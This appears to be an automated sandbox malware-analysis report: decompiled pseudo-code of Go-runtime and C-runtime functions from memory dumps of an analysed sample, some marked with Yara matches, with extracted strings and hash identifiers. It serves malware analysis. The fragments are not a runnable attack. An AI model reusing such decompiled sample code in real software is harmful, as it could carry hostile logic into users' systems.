                                                                                                                            • Instruction Fuzzy Hash: 65417E36255E0A4FFFA5EB58EC997B436D1F719322F684068F109C25A1DF3CE8828725
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130F325 Relevance: 12.6, Strings: 10, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E0130F325(long long _a8, long long _a24) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				char _v33;
				char _t29;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				long long _t85;
				intOrPtr _t88;
				intOrPtr _t98;
				long long _t106;
				void* _t109;
				long long _t110;
				long long _t112;
				void* _t116;

				_t76 = _t29;
				 *_t85 =  *_t85 + _t75;
				 *((intOrPtr*)(_t85 - 0x7d)) =  *((intOrPtr*)(_t85 - 0x7d)) + _t29;
				_v8 = _t112;
				_t113 =  &_v8;
				_a8 = _t85;
				_a24 = _t107;
				_v16 = _t106;
				_v24 = _t110;
				E01332340(_t109,  &_v8, _t116);
				E01332340(_t109,  &_v8, _t116);
				E01332C40(_t76, _t78, _t79, _t80, 0x1388c74, _t106,  &_v8, _t116);
				L01332AA0(_t77, _t78, _t80, _v16, _t107, _t113, _t116);
				L013323C0(_t109, _t113, _t116);
				_t88 = _a8;
				if(_t88 == 0) {
					L5:
					E01332340(_t109, _t113, _t116);
					E013325A0(_t76, _t77, _t78, _t79, _t80, _t113, _t116);
					L013323C0(_t109, _t113, _t116);
					if(_a24 != 0) {
						L7:
						E01332340(_t109, _t113, _t116);
						E01332C40(_t76, _t78, _t79, _t80, 0x138c1d2, _t106, _t113, _t116);
						L01332AA0(_t77, _t78, _t80, _a24, _t107, _t113, _t116);
						E01332C40(_t76, _t78, _t79, _t80,  &M0138678B, _t106, _t113, _t116);
						L01332AA0(_t77, _t78, _t80, _v24, _t107, _t113, _t116);
						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t106, _t113, _t116);
						L013323C0(_t109, _t113, _t116);
						L0131AD60(_t79, 0x1386cf5, _t106, _a24, _v24, _t113, _t116);
					}
					_t107 =  *((intOrPtr*)(_t116 + 0x30));
					 *((char*)( *((intOrPtr*)(_t116 + 0x30)) + 0xf9)) = 2;
					E01330BA0(0x138eed5, _t106, _t113);
					goto L7;
				} else {
					_t76 =  *((intOrPtr*)(_t88 + 0x63));
					_v33 = _t76;
					if(_t76 == 1) {
						E01332340(_t109, _t113, _t116);
						E01332C40(_t76, _t78, _t79, _t80, 0x138ac71, _t106, _t113, _t116);
						L013323C0(_t109, _t113, _t116);
					} else {
						E01332340(_t109, _t113, _t116);
						E01332C40(_t76, _t78, _t79, _t80, 0x1389644, _t106, _t113, _t116);
						L013323C0(_t109, _t113, _t116);
					}
					_t98 = _a8;
					_t107 =  *((intOrPtr*)(_t98 + 0x70));
					_v16 =  *((intOrPtr*)(_t98 + 0x70));
					_v32 =  *((intOrPtr*)(_t98 + 0x18));
					E01332340(_t109, _t113, _t116);
					E01332C40(_t76, _t78, _t79, _t80, 0x1387e46, _t106, _t113, _t116);
					L01332AA0(_t77, _t78, _t80, _v32,  *((intOrPtr*)(_t98 + 0x70)), _t113, _t116);
					E01332C40(_t76, _t78, _t79, _t80, 0x1387ac4, _t106, _t113, _t116);
					L01332AA0(_t77, _t78, _t80, _v16,  *((intOrPtr*)(_t98 + 0x70)), _t113, _t116);
					E01332C40(_t76, _t78, _t79, _t80, 0x1387ad0, _t106, _t113, _t116);
					E01332940(_t78, _t79, _t80, 0x1387ad0, _t107, _t113, _t116);
					L013323C0(_t109, _t113, _t116);
					goto L5;
				}
			}






















                                                                                                                            0x0130f325
                                                                                                                            0x0130f327
                                                                                                                            0x0130f329
                                                                                                                            0x0130f32e
                                                                                                                            0x0130f333
                                                                                                                            0x0130f338
                                                                                                                            0x0130f33d
                                                                                                                            0x0130f342
                                                                                                                            0x0130f347
                                                                                                                            0x0130f34c
                                                                                                                            0x0130f351
                                                                                                                            0x0130f362
                                                                                                                            0x0130f36c
                                                                                                                            0x0130f371
                                                                                                                            0x0130f376
                                                                                                                            0x0130f383
                                                                                                                            0x0130f437
                                                                                                                            0x0130f437
                                                                                                                            0x0130f440
                                                                                                                            0x0130f445
                                                                                                                            0x0130f452
                                                                                                                            0x0130f470
                                                                                                                            0x0130f470
                                                                                                                            0x0130f481
                                                                                                                            0x0130f48b
                                                                                                                            0x0130f4a0
                                                                                                                            0x0130f4aa
                                                                                                                            0x0130f4c0
                                                                                                                            0x0130f4c5
                                                                                                                            0x0130f4e0
                                                                                                                            0x0130f4e0
                                                                                                                            0x0130f454
                                                                                                                            0x0130f458
                                                                                                                            0x0130f46b
                                                                                                                            0x00000000
                                                                                                                            0x0130f38a
                                                                                                                            0x0130f38a
                                                                                                                            0x0130f38d
                                                                                                                            0x0130f394
                                                                                                                            0x0130f4ea
                                                                                                                            0x0130f500
                                                                                                                            0x0130f505
                                                                                                                            0x0130f39a
                                                                                                                            0x0130f39a
                                                                                                                            0x0130f3ab
                                                                                                                            0x0130f3b0
                                                                                                                            0x0130f3b0
                                                                                                                            0x0130f3b5
                                                                                                                            0x0130f3ba
                                                                                                                            0x0130f3be
                                                                                                                            0x0130f3c7
                                                                                                                            0x0130f3cc
                                                                                                                            0x0130f3e0
                                                                                                                            0x0130f3ea
                                                                                                                            0x0130f400
                                                                                                                            0x0130f40a
                                                                                                                            0x0130f420
                                                                                                                            0x0130f42d
                                                                                                                            0x0130f432
                                                                                                                            0x00000000
                                                                                                                            0x0130f432

                                                                                                                            Strings
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0130F490
                                                                                                                            • to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWGODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealan, xrefs: 0130F4EF
                                                                                                                            • span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExW, xrefs: 0130F3D1
                                                                                                                            • to unallocated spanArabic Standard TimeAzores Standard TimeCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetProcessMemoryInfoIDS_Trinary_Operator, xrefs: 0130F39F
                                                                                                                            • runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t, xrefs: 0130F356
                                                                                                                            • runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutex) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian, xrefs: 0130F475
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0130F4AF
                                                                                                                            • found bad pointer in Go heap (incorrect use of unsafe or cgo?)runtime: internal error: misuse of lockOSThread/unlockOSThreadABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_compileC, xrefs: 0130F45F
                                                                                                                            • span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOf, xrefs: 0130F3EF
                                                                                                                            • objectpopcntrdtscpselectsocketstringstructsweep sysmontimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaic, xrefs: 0130F4CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExW$ span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOf$ to unallocated spanArabic Standard TimeAzores Standard TimeCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetProcessMemoryInfoIDS_Trinary_Operator$ to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWGODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealan$), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$+,-./0:<=?CLMPSZ[\$found bad pointer in Go heap (incorrect use of unsafe or cgo?)runtime: internal error: misuse of lockOSThread/unlockOSThreadABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_compileC$objectpopcntrdtscpselectsocketstringstructsweep sysmontimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaic$runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutex) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian$runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t
                                                                                                                            • API String ID: 0-844679649
                                                                                                                            • Opcode ID: 099ff3dcdf718d9e8b42492bf9f476a288a11f1f92c499c3249f758845e325aa
                                                                                                                            • Instruction ID: 81bb997cccdc6cd3b2b1ddc9bb1bce31473f47804755d7a0141055ed7f6f97bb
                                                                                                                            • Opcode Fuzzy Hash: 099ff3dcdf718d9e8b42492bf9f476a288a11f1f92c499c3249f758845e325aa
                                                                                                                            • Instruction Fuzzy Hash: 51417B32215B82C6DB15BB68E48039FBBA8FBE8758F841061EE8E03774DF28C544C725
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A79E78 Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2288870239-0
                                                                                                                            • Opcode ID: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction ID: 0cf2cd695b350dc328095373b71d621a2940d46470cc00f6be4e23795585c509
                                                                                                                            • Opcode Fuzzy Hash: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction Fuzzy Hash: DA31DD23211E0681FE579B15EC5D3BC63A0EB587B2F3C0116F91906EA9DF7D8465A338
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A80064 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E0000025B25BF8A80064(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rdx, signed int _a8, long long _a16) {
				void* __rdi;
				void* __rsi;
				void* _t22;
				void* _t35;
				void* _t37;
				void* _t40;
				signed int* _t45;
				signed long long _t48;
				signed long long _t54;
				void* _t58;
				void* _t59;

				_t35 = __edx;
				_a16 = __rbx;
				_a8 = __ecx;
				r14d = r8d;
				if (__edi != 0xfffffffe) goto 0xf8a8009f;
				E0000025B25BF8A7B82C(__rax);
				 *__rax =  *__rax & 0x00000000;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a8012e;
				if (__ecx < 0) goto 0xf8a80116;
				_t40 = __edi -  *0xf8aa7384;
				if (_t40 >= 0) goto 0xf8a80116;
				_t54 = __ecx >> 5;
				_t48 = __ecx * 0x58;
				if (_t40 == 0) goto 0xf8a80116;
				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t54);
				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t54 * 8));
				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a800f5;
				r8d = r14d;
				E0000025B25BF8A80144(__ebx & 0x0000001f, __edi, _t35, _t37, _t45, _t48, __rdx, _t58, _t59);
				goto 0xf8a8010b;
				E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				E0000025B25BF8A7B82C(_t45);
				 *_t45 =  *_t45 & 0x00000000;
				0xf8a84408();
				goto 0xf8a80131;
				E0000025B25BF8A7B82C(_t45);
				 *_t45 =  *_t45 & 0x00000000;
				_t22 = E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				return E0000025B25BF8A7BEC4(_t22) | 0xffffffff;
			}














                                                                                                                            0x25bf8a80064
                                                                                                                            0x25bf8a80064
                                                                                                                            0x25bf8a80069
                                                                                                                            0x25bf8a80079
                                                                                                                            0x25bf8a80085
                                                                                                                            0x25bf8a80087
                                                                                                                            0x25bf8a8008c
                                                                                                                            0x25bf8a8008f
                                                                                                                            0x25bf8a80094
                                                                                                                            0x25bf8a8009a
                                                                                                                            0x25bf8a800a1
                                                                                                                            0x25bf8a800a3
                                                                                                                            0x25bf8a800a9
                                                                                                                            0x25bf8a800b1
                                                                                                                            0x25bf8a800bf
                                                                                                                            0x25bf8a800cf
                                                                                                                            0x25bf8a800d3
                                                                                                                            0x25bf8a800d9
                                                                                                                            0x25bf8a800e2
                                                                                                                            0x25bf8a800e4
                                                                                                                            0x25bf8a800ec
                                                                                                                            0x25bf8a800f3
                                                                                                                            0x25bf8a800f5
                                                                                                                            0x25bf8a800fa
                                                                                                                            0x25bf8a80100
                                                                                                                            0x25bf8a80105
                                                                                                                            0x25bf8a8010d
                                                                                                                            0x25bf8a80114
                                                                                                                            0x25bf8a80116
                                                                                                                            0x25bf8a8011b
                                                                                                                            0x25bf8a8011e
                                                                                                                            0x25bf8a80123
                                                                                                                            0x25bf8a80142

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2611593033-0
                                                                                                                            • Opcode ID: 6f54ccc967a67daf497eec524ed76a3fc60e08e7120b96d01ee8ba5a1f37f4bc
                                                                                                                            • Instruction ID: 93c7088478a2e6738f1003e2571999374443521c694ad7b63ce5a680f50956a0
                                                                                                                            • Opcode Fuzzy Hash: 6f54ccc967a67daf497eec524ed76a3fc60e08e7120b96d01ee8ba5a1f37f4bc
                                                                                                                            • Instruction Fuzzy Hash: A1218E73600D4086FF176F25ED493BD6A61E790BB3F294114FA250BAD2CB7888529B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7F88C Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E0000025B25BF8A7F88C(void* __ebx, signed int __ecx, void* __edx, signed int __edi, signed int* __rax, long long __rbx, signed int _a8, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* _t21;
				void* _t31;
				void* _t38;
				signed int* _t43;
				signed long long _t48;
				signed long long _t50;

				_t31 = __edx;
				_a24 = __rbx;
				_a8 = __ecx;
				_t45 = __ecx;
				if (__ebx != 0xfffffffe) goto 0xf8a7f8bd;
				E0000025B25BF8A7B82C(__rax);
				 *__rax =  *__rax & 0x00000000;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a7f93e;
				if (__ecx < 0) goto 0xf8a7f926;
				_t38 = __ebx -  *0xf8aa7384;
				if (_t38 >= 0) goto 0xf8a7f926;
				_t50 = __ecx >> 5;
				_t48 = __ecx * 0x58;
				if (_t38 == 0) goto 0xf8a7f926;
				E0000025B25BF8A83FA8(__ebx, __ebx, __ecx, _t48, _t50);
				_t43 =  *((intOrPtr*)(0xf8aa3200 + _t50 * 8));
				if (( *(_t43 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a7f90d;
				E0000025B25BF8A7F950(__ebx, _t31, __edi & 0x0000001f, _t43, _t45);
				goto 0xf8a7f91b;
				E0000025B25BF8A7B89C(_t43);
				 *_t43 = 9;
				0xf8a84408();
				goto 0xf8a7f941;
				E0000025B25BF8A7B82C(_t43);
				 *_t43 =  *_t43 & 0x00000000;
				_t21 = E0000025B25BF8A7B89C(_t43);
				 *_t43 = 9;
				return E0000025B25BF8A7BEC4(_t21) | 0xffffffff;
			}











                                                                                                                            0x25bf8a7f88c
                                                                                                                            0x25bf8a7f88c
                                                                                                                            0x25bf8a7f891
                                                                                                                            0x25bf8a7f89d
                                                                                                                            0x25bf8a7f8a3
                                                                                                                            0x25bf8a7f8a5
                                                                                                                            0x25bf8a7f8aa
                                                                                                                            0x25bf8a7f8ad
                                                                                                                            0x25bf8a7f8b2
                                                                                                                            0x25bf8a7f8b8
                                                                                                                            0x25bf8a7f8bf
                                                                                                                            0x25bf8a7f8c1
                                                                                                                            0x25bf8a7f8c7
                                                                                                                            0x25bf8a7f8cf
                                                                                                                            0x25bf8a7f8dd
                                                                                                                            0x25bf8a7f8ed
                                                                                                                            0x25bf8a7f8f1
                                                                                                                            0x25bf8a7f8f7
                                                                                                                            0x25bf8a7f900
                                                                                                                            0x25bf8a7f904
                                                                                                                            0x25bf8a7f90b
                                                                                                                            0x25bf8a7f90d
                                                                                                                            0x25bf8a7f912
                                                                                                                            0x25bf8a7f91d
                                                                                                                            0x25bf8a7f924
                                                                                                                            0x25bf8a7f926
                                                                                                                            0x25bf8a7f92b
                                                                                                                            0x25bf8a7f92e
                                                                                                                            0x25bf8a7f933
                                                                                                                            0x25bf8a7f94e

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4060740672-0
                                                                                                                            • Opcode ID: 5415f8f71c50dd1b57a5a1df961e6f1494d76ea9967bd7bf989da7e7dd621733
                                                                                                                            • Instruction ID: 3cb12f73748af3c3dd65479be977d2e4323f458d0665d66a516e592de477222d
                                                                                                                            • Opcode Fuzzy Hash: 5415f8f71c50dd1b57a5a1df961e6f1494d76ea9967bd7bf989da7e7dd621733
                                                                                                                            • Instruction Fuzzy Hash: AE118933600E40A6FE176F35AD893AC6A50E780773F364624F92907AD6D77888429B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01330420 Relevance: 11.6, Strings: 9, Instructions: 391COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • recovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompar, xrefs: 013308EE
                                                                                                                            • bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou, xrefs: 0133092D
                                                                                                                            • panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g , xrefs: 01330AAA
                                                                                                                            • bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win, xrefs: 0133093E
                                                                                                                            • panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGu, xrefs: 01330954, 013309AA, 01330A6A, 01330AC5
                                                                                                                            • panic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate no, xrefs: 01330AFF
                                                                                                                            • panic during preemptoffprocresize: invalid argreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack g, xrefs: 01330A54
                                                                                                                            • panic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not, xrefs: 0133098F
                                                                                                                            • preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level], xrefs: 013309EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: bad defer entry in panicbypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by win$bypassed recovery failedcan't scan our own stackconnection reset by peerdouble traceGCSweepStartfunction not implementedgcDrainN phase incorrectinitSpan: unaligned baselevel 2 not synchronizedlink number out of rangenot supported by windowsout of streams resou$panic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g $panic during preemptoffprocresize: invalid argreflect.methodValueCallruntime: internal errorruntime: invalid type runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack g$panic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not$panic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate no$panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status 